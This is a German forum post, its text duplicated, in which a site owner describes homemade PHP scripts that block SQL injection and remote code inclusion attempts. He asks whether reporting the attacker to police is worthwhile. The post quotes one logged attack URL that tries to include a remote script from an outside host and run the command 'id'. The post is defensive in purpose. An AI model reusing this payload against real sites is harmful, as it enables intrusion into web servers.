keksausmainz
Registered User
Hallo zusammen,
ich habe schon einmal durch eine SQL Injection Stress gehabt und bin seitdem mit einigen (eigens dafür erstellten) Scripts, die ich automatisch durch die PHP-Einstellung prepend_file einbinde, geschützt.
Bei jeder Attacke lasse ich mir dann eine E-Mail schicken mit IP, Query String und Timestamp. In wie weit das mit der IP-Adresse rechtlich einwandfrei ist (weil man diese ja aktuellerweise nicht mehr speichern darf) ist mir in dem Fall schnuppe.
Jedenfalls erhalte ich pro Tag ca. 4-8 Mails vom Script. Jemand versucht andauernd SQL Injections und fremden Code einzuschmuggeln, was durch das Script immer verhindert wird.
Das sieht dann meist so aus:
Mich nervt das nicht nur, es ärgert mich auch tierisch. Die IP Adresse ist offensichtlich gefälscht, da sie laut Welcome to RIPE.NET nicht vergeben ist.
Wäre eine Anzeige gegen Unbekannt sinnvoll bzw. würde das überhaupt was bringen? Der Code, der eingeschleust werden soll, kommt vom Domainnamen her mal aus Deutschland, dann aus China, dann mal wieder aus Russland, ich schätze es handelt sich da auch um gehackte Seiten, deren Beitreiber das noch nicht gemerkt haben...
Gruß,
Max
ich habe schon einmal durch eine SQL Injection Stress gehabt und bin seitdem mit einigen (eigens dafür erstellten) Scripts, die ich automatisch durch die PHP-Einstellung prepend_file einbinde, geschützt.
Bei jeder Attacke lasse ich mir dann eine E-Mail schicken mit IP, Query String und Timestamp. In wie weit das mit der IP-Adresse rechtlich einwandfrei ist (weil man diese ja aktuellerweise nicht mehr speichern darf) ist mir in dem Fall schnuppe.
Jedenfalls erhalte ich pro Tag ca. 4-8 Mails vom Script. Jemand versucht andauernd SQL Injections und fremden Code einzuschmuggeln, was durch das Script immer verhindert wird.
Das sieht dann meist so aus:
Methode: Externer Code ("http://" in "path" erkannt)
Timestamp: 1192271763
IP: 189.13.180.128 (X-Forwarded: -)
URL: www.domain.com/cms/index.php?core=loinpa&path=http://www.domain.co.kr/tool25.txt?&cmd=id
---Ende des Berichts---
Mich nervt das nicht nur, es ärgert mich auch tierisch. Die IP Adresse ist offensichtlich gefälscht, da sie laut Welcome to RIPE.NET nicht vergeben ist.
Wäre eine Anzeige gegen Unbekannt sinnvoll bzw. würde das überhaupt was bringen? Der Code, der eingeschleust werden soll, kommt vom Domainnamen her mal aus Deutschland, dann aus China, dann mal wieder aus Russland, ich schätze es handelt sich da auch um gehackte Seiten, deren Beitreiber das noch nicht gemerkt haben...
Gruß,
Max
Last edited by a moderator: